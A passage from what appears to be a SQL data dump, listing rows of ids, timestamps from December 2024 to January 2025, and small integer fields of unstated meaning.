(15016, '2024-12-07 11:05:50', 1, 2059, 0, 1, 1),
(15017, '2024-12-07 11:18:22', 1, 2064, 0, 1, 1),
(15018, '2024-12-07 12:15:39', 1, 2060, 0, 1, 1),
(15019, '2024-12-07 12:23:52', 1, 2063, 0, 1, 1),
(15020, '2024-12-07 12:43:43', 1, 2058, 0, 1, 1),
(15021, '2024-12-07 13:21:46', 1, 2055, 0, 1, 1),
(15022, '2024-12-07 14:30:21', 1, 2061, 0, 1, 1),
(15023, '2024-12-07 15:09:13', 1, 2062, 0, 1, 1),
(15024, '2024-12-07 16:18:13', 1, 2060, 0, 1, 1),
(15025, '2024-12-07 16:26:34', 1, 2063, 0, 1, 1),
(15026, '2024-12-07 16:47:04', 1, 2058, 0, 1, 1),
(15027, '2024-12-07 17:26:21', 1, 2055, 0, 1, 1),
(15028, '2024-12-07 17:37:21', 1, 2064, 0, 1, 1),
(15029, '2024-12-07 18:38:41', 1, 2061, 0, 1, 1),
(15030, '2024-12-07 19:18:46', 1, 2062, 0, 1, 1),
(15031, '2024-12-07 20:29:29', 1, 2054, 0, 1, 1),
(15032, '2024-12-07 20:44:16', 1, 2059, 0, 1, 1),
(15033, '2024-12-07 20:57:31', 1, 2064, 0, 1, 1),
(15034, '2024-12-07 21:40:23', 1, 2060, 0, 1, 1),
(15035, '2024-12-07 21:48:40', 1, 2063, 0, 1, 1),
(15036, '2024-12-07 22:08:53', 1, 2058, 0, 1, 1),
(15037, '2024-12-07 22:46:42', 1, 2055, 0, 1, 1),
(15038, '2024-12-07 23:13:18', 1, 2060, 0, 1, 1),
(15039, '2024-12-07 23:22:11', 1, 2063, 0, 1, 1),
(15040, '2024-12-07 23:43:41', 1, 2058, 0, 1, 1),
(15041, '2024-12-08 00:24:26', 1, 2055, 0, 1, 1),
(15042, '2024-12-08 00:58:48', 1, 2060, 0, 1, 1),
(15043, '2024-12-08 01:06:49', 1, 2063, 0, 1, 1),
(15044, '2024-12-08 01:26:28', 1, 2058, 0, 1, 1),
(15045, '2024-12-08 02:03:59', 1, 2055, 0, 1, 1),
(15046, '2024-12-08 03:15:02', 1, 2061, 0, 1, 1),
(15047, '2024-12-08 03:41:45', 1, 2059, 0, 1, 1),
(15048, '2024-12-08 03:54:30', 1, 2062, 0, 1, 1),
(15049, '2024-12-08 04:44:19', 1, 2054, 0, 1, 1),
(15050, '2024-12-08 05:01:52', 1, 2054, 0, 1, 1),
(15051, '2024-12-08 05:15:56', 1, 2059, 0, 1, 1),
(15052, '2024-12-08 05:28:33', 1, 2064, 0, 1, 1),
(15053, '2024-12-08 06:54:38', 1, 2060, 0, 1, 1),
(15054, '2024-12-08 07:03:40', 1, 2063, 0, 1, 1),
(15055, '2024-12-08 07:42:40', 1, 2060, 0, 1, 1),
(15056, '2024-12-08 07:50:27', 1, 2063, 0, 1, 1),
(15057, '2024-12-08 08:09:48', 1, 2058, 0, 1, 1),
(15058, '2024-12-08 08:47:28', 1, 2055, 0, 1, 1),
(15059, '2024-12-08 09:56:46', 1, 2061, 0, 1, 1),
(15060, '2024-12-08 10:34:49', 1, 2062, 0, 1, 1),
(15061, '2024-12-08 11:41:59', 1, 2054, 0, 1, 1),
(15062, '2024-12-08 11:55:51', 1, 2059, 0, 1, 1),
(15063, '2024-12-08 12:08:19', 1, 2064, 0, 1, 1),
(15064, '2024-12-08 14:45:51', 1, 2063, 0, 1, 1),
(15065, '2024-12-08 16:27:58', 1, 2063, 0, 1, 1),
(15066, '2024-12-08 20:11:09', 1, 2054, 0, 1, 1),
(15067, '2024-12-09 02:22:21', 1, 2063, 0, 1, 1),
(15068, '2024-12-09 16:46:36', 1, 2063, 0, 1, 1),
(15069, '2024-12-09 16:57:17', 1, 2063, 0, 1, 1),
(15070, '2024-12-09 17:08:47', 1, 2054, 0, 1, 1),
(15071, '2024-12-09 21:13:39', 1, 2063, 0, 1, 1),
(15072, '2024-12-10 06:33:11', 1, 2063, 0, 1, 1),
(15073, '2024-12-10 06:46:59', 1, 2054, 0, 1, 1),
(15074, '2024-12-10 07:43:08', 1, 2062, 0, 1, 1),
(15075, '2024-12-10 10:29:44', 1, 2062, 0, 1, 1),
(15076, '2024-12-10 12:16:45', 1, 2054, 0, 1, 1),
(15077, '2024-12-10 12:58:46', 1, 2053, 0, 1, 1),
(15078, '2024-12-10 15:09:24', 1, 2061, 0, 1, 1),
(15079, '2024-12-10 15:48:50', 1, 2064, 0, 1, 1),
(15080, '2024-12-10 18:15:47', 1, 2063, 0, 1, 1),
(15081, '2024-12-10 20:03:56', 1, 2063, 0, 1, 1),
(15082, '2024-12-10 20:57:04', 1, 2054, 0, 1, 1),
(15083, '2024-12-11 00:18:33', 1, 2058, 0, 1, 1),
(15084, '2024-12-11 00:23:33', 1, 2061, 0, 1, 1),
(15085, '2024-12-11 01:06:47', 1, 2062, 0, 1, 1),
(15086, '2024-12-11 05:45:10', 1, 2061, 0, 1, 1),
(15087, '2024-12-11 05:51:00', 1, 2061, 0, 1, 1),
(15088, '2024-12-11 08:13:44', 1, 2063, 0, 1, 1),
(15089, '2024-12-11 21:41:00', 1, 2054, 0, 1, 1),
(15090, '2024-12-12 03:14:09', 1, 2064, 0, 1, 1),
(15091, '2024-12-12 04:02:31', 1, 2061, 0, 1, 1),
(15092, '2024-12-12 04:34:11', 1, 2064, 0, 1, 1),
(15093, '2024-12-12 13:04:21', 1, 2054, 0, 1, 1),
(15094, '2024-12-13 04:28:38', 1, 2053, 0, 1, 1),
(15095, '2024-12-13 09:14:35', 1, 2064, 0, 1, 1),
(15096, '2024-12-13 20:19:27', 1, 2063, 0, 1, 1),
(15097, '2024-12-13 20:31:46', 1, 2061, 0, 1, 1),
(15098, '2024-12-14 00:49:27', 1, 2061, 0, 1, 1),
(15099, '2024-12-14 01:15:41', 1, 2062, 0, 1, 1),
(15100, '2024-12-14 05:05:48', 1, 2058, 0, 1, 1),
(15101, '2024-12-14 05:54:39', 1, 2059, 0, 1, 1),
(15102, '2024-12-14 12:02:42', 1, 2060, 0, 1, 1),
(15103, '2024-12-14 12:02:47', 1, 2054, 0, 1, 1),
(15104, '2024-12-14 12:02:49', 1, 2055, 0, 1, 1),
(15105, '2024-12-14 12:02:50', 1, 2059, 0, 1, 1),
(15106, '2024-12-14 12:02:51', 1, 2058, 0, 1, 1),
(15107, '2024-12-14 12:02:52', 1, 2063, 0, 1, 1),
(15108, '2024-12-14 12:02:53', 1, 2062, 0, 1, 1),
(15109, '2024-12-14 12:02:56', 1, 2061, 0, 1, 1),
(15110, '2024-12-14 12:02:59', 1, 2064, 0, 1, 1),
(15111, '2024-12-14 12:03:04', 1, 2053, 0, 1, 1),
(15112, '2024-12-14 13:18:18', 1, 2064, 0, 1, 1),
(15113, '2024-12-15 05:56:00', 1, 2054, 0, 1, 1),
(15114, '2024-12-15 17:22:20', 1, 2064, 0, 1, 1),
(15115, '2024-12-15 19:45:50', 1, 2054, 0, 1, 1),
(15116, '2024-12-16 00:50:15', 1, 2061, 0, 1, 1),
(15117, '2024-12-16 04:58:04', 1, 2058, 0, 1, 1),
(15118, '2024-12-16 05:43:14', 1, 2054, 0, 1, 1),
(15119, '2024-12-16 08:43:14', 1, 2062, 0, 1, 1),
(15120, '2024-12-16 09:05:37', 1, 2060, 0, 1, 1),
(15121, '2024-12-16 10:57:08', 1, 2063, 0, 1, 1),
(15122, '2024-12-16 14:48:25', 1, 2054, 0, 1, 1),
(15123, '2024-12-16 20:46:42', 1, 2058, 0, 1, 1),
(15124, '2024-12-17 13:54:12', 1, 2062, 0, 1, 1),
(15125, '2024-12-17 14:10:17', 1, 2060, 0, 1, 1),
(15126, '2024-12-17 18:07:20', 1, 2059, 0, 1, 1),
(15127, '2024-12-17 21:04:02', 1, 2059, 0, 1, 1),
(15128, '2024-12-18 02:43:43', 1, 2059, 0, 1, 1),
(15129, '2024-12-18 02:46:02', 1, 2053, 0, 1, 1),
(15130, '2024-12-18 04:41:45', 1, 2063, 0, 1, 1),
(15131, '2024-12-18 07:07:28', 1, 2059, 0, 1, 1),
(15132, '2024-12-18 07:33:53', 1, 2064, 0, 1, 1),
(15133, '2024-12-18 11:02:52', 1, 2064, 0, 1, 1),
(15134, '2024-12-18 13:03:33', 1, 2055, 0, 1, 1),
(15135, '2024-12-18 14:23:18', 1, 2060, 0, 1, 1),
(15136, '2024-12-18 14:41:06', 1, 2064, 0, 1, 1),
(15137, '2024-12-18 17:11:33', 1, 2054, 0, 1, 1),
(15138, '2024-12-18 19:17:54', 1, 2055, 0, 1, 1),
(15139, '2024-12-18 20:28:24', 1, 2061, 0, 1, 1),
(15140, '2024-12-18 22:16:17', 1, 2062, 0, 1, 1),
(15141, '2024-12-19 06:19:44', 1, 2064, 0, 1, 1),
(15142, '2024-12-19 06:20:23', 1, 2064, 0, 1, 1),
(15143, '2024-12-19 06:23:59', 1, 2062, 0, 1, 1),
(15144, '2024-12-19 06:24:11', 1, 2062, 0, 1, 1),
(15145, '2024-12-19 06:24:54', 1, 2053, 0, 1, 1),
(15146, '2024-12-19 06:26:27', 1, 2063, 0, 1, 1),
(15147, '2024-12-19 06:26:44', 1, 2063, 0, 1, 1),
(15148, '2024-12-19 06:26:55', 1, 2061, 0, 1, 1),
(15149, '2024-12-19 06:27:07', 1, 2061, 0, 1, 1),
(15150, '2024-12-19 06:27:27', 1, 2059, 0, 1, 1),
(15151, '2024-12-19 06:27:39', 1, 2059, 0, 1, 1),
(15152, '2024-12-19 06:28:32', 1, 2064, 0, 1, 1),
(15153, '2024-12-19 06:28:35', 1, 2058, 0, 1, 1),
(15154, '2024-12-19 06:28:47', 1, 2058, 0, 1, 1),
(15155, '2024-12-19 06:30:23', 1, 2055, 0, 1, 1),
(15156, '2024-12-19 06:30:35', 1, 2055, 0, 1, 1),
(15157, '2024-12-19 06:30:47', 1, 2054, 0, 1, 1),
(15158, '2024-12-19 06:30:58', 1, 2054, 0, 1, 1),
(15159, '2024-12-19 06:35:19', 1, 2060, 0, 1, 1),
(15160, '2024-12-19 06:35:31', 1, 2060, 0, 1, 1),
(15161, '2024-12-19 08:03:14', 1, 2054, 0, 1, 1),
(15162, '2024-12-19 09:44:26', 1, 2062, 0, 1, 1),
(15163, '2024-12-19 13:12:00', 1, 2061, 0, 1, 1),
(15164, '2024-12-20 01:54:11', 1, 2053, 0, 1, 1),
(15165, '2024-12-20 02:11:47', 1, 2062, 0, 1, 1),
(15166, '2024-12-20 04:07:52', 1, 2062, 0, 1, 1),
(15167, '2024-12-20 05:41:52', 1, 2054, 0, 1, 1),
(15168, '2024-12-20 05:42:25', 1, 2059, 0, 1, 1),
(15169, '2024-12-20 05:42:28', 1, 2061, 0, 1, 1),
(15170, '2024-12-20 05:42:31', 1, 2058, 0, 1, 1),
(15171, '2024-12-20 06:39:06', 1, 2062, 0, 1, 1),
(15172, '2024-12-20 12:03:24', 1, 2058, 0, 1, 1),
(15173, '2024-12-20 12:07:30', 1, 2053, 0, 1, 1),
(15174, '2024-12-21 00:03:59', 1, 2054, 0, 1, 1),
(15175, '2024-12-21 00:04:02', 1, 2055, 0, 1, 1),
(15176, '2024-12-21 00:04:11', 1, 2064, 0, 1, 1),
(15177, '2024-12-21 00:04:14', 1, 2063, 0, 1, 1),
(15178, '2024-12-21 00:04:17', 1, 2062, 0, 1, 1),
(15179, '2024-12-21 00:04:19', 1, 2060, 0, 1, 1),
(15180, '2024-12-21 00:04:21', 1, 2059, 0, 1, 1),
(15181, '2024-12-21 00:04:23', 1, 2061, 0, 1, 1),
(15182, '2024-12-21 00:04:27', 1, 2058, 0, 1, 1),
(15183, '2024-12-21 00:49:59', 1, 2053, 0, 1, 1),
(15184, '2024-12-21 04:11:47', 1, 2059, 0, 1, 1),
(15185, '2024-12-21 06:32:39', 1, 2058, 0, 1, 1),
(15186, '2024-12-22 02:28:51', 1, 2064, 0, 1, 1),
(15187, '2024-12-22 07:56:32', 1, 2055, 0, 1, 1),
(15188, '2024-12-22 07:56:37', 1, 2064, 0, 1, 1),
(15189, '2024-12-22 07:56:39', 1, 2061, 0, 1, 1),
(15190, '2024-12-22 07:56:42', 1, 2058, 0, 1, 1),
(15191, '2024-12-22 14:45:22', 1, 2059, 0, 1, 1),
(15192, '2024-12-22 16:41:28', 1, 2059, 0, 1, 1),
(15193, '2024-12-23 04:09:09', 1, 2060, 0, 1, 1),
(15194, '2024-12-23 04:43:20', 1, 2060, 0, 1, 1),
(15195, '2024-12-23 04:52:35', 1, 2063, 0, 1, 1),
(15196, '2024-12-23 05:13:50', 1, 2058, 0, 1, 1),
(15197, '2024-12-23 05:19:56', 1, 2061, 0, 1, 1),
(15198, '2024-12-23 05:48:21', 1, 2055, 0, 1, 1),
(15199, '2024-12-23 06:39:31', 1, 2061, 0, 1, 1),
(15200, '2024-12-23 07:04:53', 1, 2062, 0, 1, 1),
(15201, '2024-12-23 08:01:27', 1, 2054, 0, 1, 1),
(15202, '2024-12-23 08:15:54', 1, 2059, 0, 1, 1),
(15203, '2024-12-23 08:29:13', 1, 2064, 0, 1, 1),
(15204, '2024-12-23 10:15:10', 1, 2060, 0, 1, 1),
(15205, '2024-12-23 12:58:51', 1, 2059, 0, 1, 1),
(15206, '2024-12-23 13:06:32', 1, 2061, 0, 1, 1),
(15207, '2024-12-23 13:08:49', 1, 2058, 0, 1, 1),
(15208, '2024-12-23 13:18:03', 1, 2055, 0, 1, 1),
(15209, '2024-12-23 13:34:41', 1, 2054, 0, 1, 1),
(15210, '2024-12-23 16:26:26', 1, 2053, 0, 1, 1),
(15211, '2024-12-23 19:02:32', 1, 2054, 0, 1, 1),
(15212, '2024-12-23 21:45:31', 1, 2054, 0, 1, 1),
(15213, '2024-12-23 22:42:27', 1, 2061, 0, 1, 1),
(15214, '2024-12-24 01:36:57', 1, 2058, 0, 1, 1),
(15215, '2024-12-24 04:29:04', 1, 2053, 0, 1, 1),
(15216, '2024-12-24 19:15:13', 1, 2064, 0, 1, 1),
(15217, '2024-12-25 00:00:15', 1, 2055, 0, 1, 1),
(15218, '2024-12-25 07:41:43', 1, 2053, 0, 1, 1),
(15219, '2024-12-25 10:55:07', 1, 2064, 0, 1, 1),
(15220, '2024-12-25 10:58:31', 1, 2064, 0, 1, 1),
(15221, '2024-12-25 11:06:08', 1, 2064, 0, 1, 1),
(15222, '2024-12-25 11:13:27', 1, 2063, 0, 1, 1),
(15223, '2024-12-25 14:18:23', 1, 2053, 0, 1, 1),
(15224, '2024-12-25 15:48:59', 1, 2053, 0, 1, 1),
(15225, '2024-12-25 19:42:15', 1, 2064, 0, 1, 1),
(15226, '2024-12-25 22:26:55', 1, 2063, 0, 1, 1),
(15227, '2024-12-26 07:38:53', 1, 2064, 0, 1, 1),
(15228, '2024-12-26 07:46:38', 1, 2060, 0, 1, 1),
(15229, '2024-12-26 08:18:43', 1, 2061, 0, 1, 1),
(15230, '2024-12-26 09:24:48', 1, 2064, 0, 1, 1),
(15231, '2024-12-27 15:24:00', 1, 2064, 0, 1, 1),
(15232, '2024-12-27 16:59:42', 1, 2060, 0, 1, 1),
(15233, '2024-12-28 07:54:00', 1, 2062, 0, 1, 1),
(15234, '2024-12-28 08:00:45', 1, 2061, 0, 1, 1),
(15235, '2024-12-28 17:49:51', 1, 2054, 0, 1, 1),
(15236, '2024-12-29 11:34:30', 1, 2064, 0, 1, 1),
(15237, '2024-12-29 20:15:56', 1, 2058, 0, 1, 1),
(15238, '2024-12-30 04:40:18', 1, 2064, 0, 1, 1),
(15239, '2024-12-30 07:04:31', 1, 2058, 0, 1, 1),
(15240, '2024-12-30 21:04:35', 1, 2059, 0, 1, 1),
(15241, '2024-12-30 21:21:26', 1, 2059, 0, 1, 1),
(15242, '2024-12-30 23:10:14', 1, 2063, 0, 1, 1),
(15243, '2024-12-31 04:33:02', 1, 2060, 0, 1, 1),
(15244, '2024-12-31 08:34:08', 1, 2060, 0, 1, 1),
(15245, '2024-12-31 12:32:50', 1, 2059, 0, 1, 1),
(15246, '2024-12-31 21:08:34', 1, 2058, 0, 1, 1),
(15247, '2025-01-01 08:09:58', 1, 2061, 0, 1, 1),
(15248, '2025-01-01 14:53:41', 1, 2062, 0, 1, 1),
(15249, '2025-01-01 19:03:28', 1, 2061, 0, 1, 1),
(15250, '2025-01-01 20:08:30', 1, 2061, 0, 1, 1),
(15251, '2025-01-01 23:59:18', 1, 2064, 0, 1, 1),
(15252, '2025-01-01 23:59:18', 1, 2058, 0, 1, 1),
(15253, '2025-01-01 23:59:18', 1, 2064, 0, 1, 1),
(15254, '2025-01-01 23:59:19', 1, 2064, 0, 1, 1),
(15255, '2025-01-01 23:59:20', 1, 2055, 0, 1, 1),
(15256, '2025-01-01 23:59:21', 1, 2053, 0, 1, 1),
(15257, '2025-01-01 23:59:37', 1, 2061, 0, 1, 1),
(15258, '2025-01-01 23:59:56', 1, 2054, 0, 1, 1),
(15259, '2025-01-01 23:59:57', 1, 2062, 0, 1, 1),
(15260, '2025-01-01 23:59:58', 1, 2060, 0, 1, 1),
(15261, '2025-01-02 00:00:00', 1, 2059, 0, 1, 1),
(15262, '2025-01-02 00:00:01', 1, 2063, 0, 1, 1),
(15263, '2025-01-02 00:00:04', 1, 2053, 0, 1, 1),
(15264, '2025-01-02 00:00:35', 1, 2053, 0, 1, 1),
(15265, '2025-01-02 00:00:38', 1, 2053, 0, 1, 1),
(15266, '2025-01-02 00:00:39', 1, 2053, 0, 1, 1),
(15267, '2025-01-02 00:00:40', 1, 2053, 0, 1, 1),
(15268, '2025-01-02 01:41:37', 1, 2059, 0, 1, 1),
(15269, '2025-01-02 01:59:47', 1, 2063, 0, 1, 1),
(15270, '2025-01-02 02:59:45', 1, 2060, 0, 1, 1),
(15271, '2025-01-02 06:24:29', 1, 2063, 0, 1, 1),
(15272, '2025-01-02 06:51:54', 1, 2064, 0, 1, 1),
(15273, '2025-01-02 07:51:36', 1, 2064, 0, 1, 1),
(15274, '2025-01-02 09:07:23', 1, 2054, 0, 1, 1),
(15275, '2025-01-02 09:10:07', 1, 2060, 0, 1, 1),
(15276, '2025-01-02 09:20:08', 1, 2063, 0, 1, 1),
(15277, '2025-01-02 09:46:31', 1, 2058, 0, 1, 1),
(15278, '2025-01-02 10:33:53', 1, 2055, 0, 1, 1),
(15279, '2025-01-02 13:45:23', 1, 2064, 0, 1, 1),
(15280, '2025-01-02 15:37:45', 1, 2060, 0, 1, 1),
(15281, '2025-01-02 15:49:29', 1, 2063, 0, 1, 1),
(15282, '2025-01-02 16:20:34', 1, 2058, 0, 1, 1),
(15283, '2025-01-02 16:53:12', 1, 2062, 0, 1, 1),
(15284, '2025-01-02 17:27:38', 1, 2060, 0, 1, 1),
(15285, '2025-01-02 17:47:14', 1, 2063, 0, 1, 1),
(15286, '2025-01-02 18:38:53', 1, 2058, 0, 1, 1),
(15287, '2025-01-02 19:21:03', 1, 2055, 0, 1, 1),
(15288, '2025-01-02 20:09:18', 1, 2054, 0, 1, 1),
(15289, '2025-01-02 20:16:39', 1, 2055, 0, 1, 1),
(15290, '2025-01-02 21:06:01', 1, 2064, 0, 1, 1),
(15291, '2025-01-02 22:33:06', 1, 2058, 0, 1, 1),
(15292, '2025-01-02 22:33:19', 1, 2061, 0, 1, 1),
(15293, '2025-01-02 22:33:29', 1, 2059, 0, 1, 1),
(15294, '2025-01-02 22:33:41', 1, 2060, 0, 1, 1),
(15295, '2025-01-02 22:33:49', 1, 2062, 0, 1, 1),
(15296, '2025-01-02 22:33:58', 1, 2063, 0, 1, 1),
(15297, '2025-01-02 22:34:06', 1, 2064, 0, 1, 1),
(15298, '2025-01-02 22:35:08', 1, 2055, 0, 1, 1),
(15299, '2025-01-02 22:35:16', 1, 2054, 0, 1, 1),
(15300, '2025-01-02 22:35:26', 1, 2053, 0, 1, 1),
(15301, '2025-01-02 23:07:54', 1, 2054, 0, 1, 1),
(15302, '2025-01-02 23:26:37', 1, 2059, 0, 1, 1),
(15303, '2025-01-02 23:52:52', 1, 2058, 0, 1, 1),
(15304, '2025-01-02 23:53:02', 1, 2061, 0, 1, 1),
(15305, '2025-01-02 23:53:12', 1, 2059, 0, 1, 1),
(15306, '2025-01-02 23:53:22', 1, 2060, 0, 1, 1),
(15307, '2025-01-02 23:53:30', 1, 2062, 0, 1, 1),
(15308, '2025-01-02 23:53:38', 1, 2063, 0, 1, 1),
(15309, '2025-01-02 23:53:47', 1, 2064, 0, 1, 1),
(15310, '2025-01-02 23:54:53', 1, 2055, 0, 1, 1),
(15311, '2025-01-02 23:55:01', 1, 2054, 0, 1, 1),
(15312, '2025-01-02 23:55:10', 1, 2053, 0, 1, 1),
(15313, '2025-01-02 23:57:59', 1, 2054, 0, 1, 1),
(15314, '2025-01-03 00:26:30', 1, 2060, 0, 1, 1),
(15315, '2025-01-03 00:36:18', 1, 2063, 0, 1, 1),
(15316, '2025-01-03 01:02:15', 1, 2058, 0, 1, 1),
(15317, '2025-01-03 01:55:07', 1, 2055, 0, 1, 1),
(15318, '2025-01-03 07:31:02', 1, 2062, 0, 1, 1),
(15319, '2025-01-03 12:30:05', 1, 2060, 0, 1, 1),
(15320, '2025-01-03 12:43:06', 1, 2063, 0, 1, 1),
(15321, '2025-01-03 13:07:34', 1, 2061, 0, 1, 1),
(15322, '2025-01-03 13:14:15', 1, 2058, 0, 1, 1),
(15323, '2025-01-03 14:05:11', 1, 2055, 0, 1, 1),
(15324, '2025-01-03 16:16:10', 1, 2062, 0, 1, 1),
(15325, '2025-01-03 17:55:56', 1, 2054, 0, 1, 1),
(15326, '2025-01-03 18:16:20', 1, 2059, 0, 1, 1),
(15327, '2025-01-03 18:31:46', 1, 2064, 0, 1, 1),
(15328, '2025-01-03 20:02:14', 1, 2060, 0, 1, 1),
(15329, '2025-01-03 20:13:07', 1, 2063, 0, 1, 1),
(15330, '2025-01-03 20:32:07', 1, 2059, 0, 1, 1),
(15331, '2025-01-03 20:44:14', 1, 2058, 0, 1, 1),
(15332, '2025-01-03 21:41:37', 1, 2055, 0, 1, 1),
(15333, '2025-01-04 02:48:03', 1, 2060, 0, 1, 1),
(15334, '2025-01-04 02:57:49', 1, 2063, 0, 1, 1),
(15335, '2025-01-04 03:23:47', 1, 2058, 0, 1, 1),
(15336, '2025-01-04 04:14:55', 1, 2055, 0, 1, 1),
(15337, '2025-01-04 04:54:18', 1, 2061, 0, 1, 1),
(15338, '2025-01-04 07:48:03', 1, 2063, 0, 1, 1),
(15339, '2025-01-04 08:01:28', 1, 2059, 0, 1, 1),
(15340, '2025-01-04 08:15:36', 1, 2064, 0, 1, 1),
(15341, '2025-01-04 18:28:15', 1, 2058, 0, 1, 1),
(15342, '2025-01-05 06:41:37', 1, 2062, 0, 1, 1),
(15343, '2025-01-05 09:58:04', 1, 2058, 0, 1, 1),
(15344, '2025-01-05 12:04:58', 1, 2061, 0, 1, 1),
(15345, '2025-01-05 15:00:20', 1, 2061, 0, 1, 1),
(15346, '2025-01-05 16:40:24', 1, 2061, 0, 1, 1),
(15347, '2025-01-05 22:35:57', 1, 2059, 0, 1, 1),
(15348, '2025-01-05 23:44:14', 1, 2061, 0, 1, 1),
(15349, '2025-01-06 04:33:59', 1, 2059, 0, 1, 1),
(15350, '2025-01-06 05:09:11', 1, 2064, 0, 1, 1),
(15351, '2025-01-06 05:23:40', 1, 2061, 0, 1, 1),
(15352, '2025-01-06 06:37:41', 1, 2061, 0, 1, 1),
(15353, '2025-01-06 07:49:11', 1, 2062, 0, 1, 1),
(15354, '2025-01-06 09:36:14', 1, 2064, 0, 1, 1),
(15355, '2025-01-06 11:30:04', 1, 2062, 0, 1, 1),
(15356, '2025-01-06 17:49:10', 1, 2063, 0, 1, 1),
(15357, '2025-01-06 18:57:45', 1, 2053, 0, 1, 1),
(15358, '2025-01-06 19:52:10', 1, 2064, 0, 1, 1),
(15359, '2025-01-07 05:04:52', 1, 2053, 0, 1, 1),
(15360, '2025-01-07 05:06:05', 1, 2063, 0, 1, 1),
(15361, '2025-01-07 05:24:45', 1, 2058, 0, 1, 1),
(15362, '2025-01-07 05:51:55', 1, 2060, 0, 1, 1),
(15363, '2025-01-07 06:48:47', 1, 2054, 0, 1, 1),
(15364, '2025-01-07 10:02:33', 1, 2063, 0, 1, 1),
(15365, '2025-01-07 11:35:29', 1, 2062, 0, 1, 1),
(15366, '2025-01-07 17:55:23', 1, 2063, 0, 1, 1),
(15367, '2025-01-07 18:57:19', 1, 2053, 0, 1, 1),
(15368, '2025-01-07 19:28:35', 1, 2063, 0, 1, 1),
(15369, '2025-01-07 21:20:26', 1, 2055, 0, 1, 1),
(15370, '2025-01-07 22:42:15', 1, 2060, 0, 1, 1),
(15371, '2025-01-07 22:59:45', 1, 2060, 0, 1, 1),
(15372, '2025-01-07 23:39:02', 1, 2064, 0, 1, 1),
(15373, '2025-01-08 00:04:46', 1, 2054, 0, 1, 1),
(15374, '2025-01-08 01:36:50', 1, 2055, 0, 1, 1),
(15375, '2025-01-08 04:34:25', 1, 2062, 0, 1, 1),
(15376, '2025-01-08 05:54:27', 1, 2060, 0, 1, 1),
(15377, '2025-01-08 07:31:47', 1, 2059, 0, 1, 1),
(15378, '2025-01-08 09:49:15', 1, 2064, 0, 1, 1),
(15379, '2025-01-08 15:06:23', 1, 2060, 0, 1, 1),
(15380, '2025-01-08 15:37:55', 1, 2055, 0, 1, 1),
(15381, '2025-01-08 15:39:55', 1, 2058, 0, 1, 1),
(15382, '2025-01-08 16:03:50', 1, 2061, 0, 1, 1),
(15383, '2025-01-08 18:30:52', 1, 2063, 0, 1, 1),
(15384, '2025-01-08 19:00:21', 1, 2053, 0, 1, 1),
(15385, '2025-01-09 03:38:20', 1, 2055, 0, 1, 1),
(15386, '2025-01-09 04:51:20', 1, 2054, 0, 1, 1),
(15387, '2025-01-09 05:58:10', 1, 2060, 0, 1, 1),
(15388, '2025-01-09 11:28:58', 1, 2062, 0, 1, 1),
(15389, '2025-01-09 12:08:14', 1, 2061, 0, 1, 1),
(15390, '2025-01-09 15:20:17', 1, 2064, 0, 1, 1),
(15391, '2025-01-09 17:51:36', 1, 2063, 0, 1, 1),
(15392, '2025-01-09 18:58:41', 1, 2053, 0, 1, 1),
(15393, '2025-01-10 04:11:03', 1, 2060, 0, 1, 1),
(15394, '2025-01-10 04:51:28', 1, 2058, 0, 1, 1),
(15395, '2025-01-10 05:49:44', 1, 2060, 0, 1, 1),
(15396, '2025-01-10 06:08:11', 1, 2058, 0, 1, 1),
(15397, '2025-01-10 07:41:22', 1, 2064, 0, 1, 1),
(15398, '2025-01-10 10:35:36', 1, 2059, 0, 1, 1),
(15399, '2025-01-10 11:26:09', 1, 2062, 0, 1, 1),
(15400, '2025-01-10 12:16:46', 1, 2063, 0, 1, 1),
(15401, '2025-01-10 13:41:36', 1, 2062, 0, 1, 1),
(15402, '2025-01-10 16:20:03', 1, 2063, 0, 1, 1),
(15403, '2025-01-10 16:20:13', 1, 2062, 0, 1, 1),
(15404, '2025-01-10 17:53:22', 1, 2063, 0, 1, 1),
(15405, '2025-01-10 18:54:34', 1, 2053, 0, 1, 1),
(15406, '2025-01-10 23:47:28', 1, 2053, 0, 1, 1),
(15407, '2025-01-11 02:47:59', 1, 2060, 0, 1, 1),
(15408, '2025-01-11 03:03:56', 1, 2053, 0, 1, 1),
(15409, '2025-01-11 03:03:59', 1, 2054, 0, 1, 1),
(15410, '2025-01-11 03:04:03', 1, 2055, 0, 1, 1),
(15411, '2025-01-11 03:04:25', 1, 2064, 0, 1, 1),
(15412, '2025-01-11 03:04:28', 1, 2063, 0, 1, 1),
(15413, '2025-01-11 03:04:31', 1, 2062, 0, 1, 1),
(15414, '2025-01-11 03:04:34', 1, 2060, 0, 1, 1),
(15415, '2025-01-11 03:04:36', 1, 2059, 0, 1, 1),
(15416, '2025-01-11 03:04:39', 1, 2061, 0, 1, 1),
(15417, '2025-01-11 03:04:42', 1, 2058, 0, 1, 1),
(15418, '2025-01-11 05:53:49', 1, 2060, 0, 1, 1),
(15419, '2025-01-11 11:33:14', 1, 2062, 0, 1, 1),
(15420, '2025-01-11 14:57:21', 1, 2064, 0, 1, 1),
(15421, '2025-01-11 17:46:15', 1, 2063, 0, 1, 1),
(15422, '2025-01-11 18:56:43', 1, 2053, 0, 1, 1),
(15423, '2025-01-12 05:38:35', 1, 2063, 0, 1, 1),
(15424, '2025-01-12 05:53:41', 1, 2060, 0, 1, 1),
(15425, '2025-01-12 06:43:43', 1, 2061, 0, 1, 1),
(15426, '2025-01-12 08:47:48', 1, 2064, 0, 1, 1),
(15427, '2025-01-12 10:04:54', 1, 2060, 0, 1, 1),
(15428, '2025-01-12 11:29:32', 1, 2062, 0, 1, 1),
(15429, '2025-01-12 14:52:42', 1, 2060, 0, 1, 1),
(15430, '2025-01-12 15:32:57', 1, 2055, 0, 1, 1),
(15431, '2025-01-12 17:45:49', 1, 2063, 0, 1, 1),
(15432, '2025-01-12 18:59:51', 1, 2053, 0, 1, 1),
(15433, '2025-01-12 19:00:13', 1, 2053, 0, 1, 1),
(15434, '2025-01-12 19:00:36', 1, 2053, 0, 1, 1),
(15435, '2025-01-12 19:01:00', 1, 2053, 0, 1, 1),
(15436, '2025-01-12 19:01:25', 1, 2053, 0, 1, 1),
(15437, '2025-01-12 19:01:49', 1, 2053, 0, 1, 1),
(15438, '2025-01-12 19:02:12', 1, 2053, 0, 1, 1),
(15439, '2025-01-12 19:02:37', 1, 2053, 0, 1, 1),
(15440, '2025-01-12 19:03:01', 1, 2053, 0, 1, 1),
(15441, '2025-01-12 19:03:25', 1, 2053, 0, 1, 1),
(15442, '2025-01-13 00:39:04', 1, 2058, 0, 1, 1),
(15443, '2025-01-13 04:06:33', 1, 2053, 0, 1, 1),
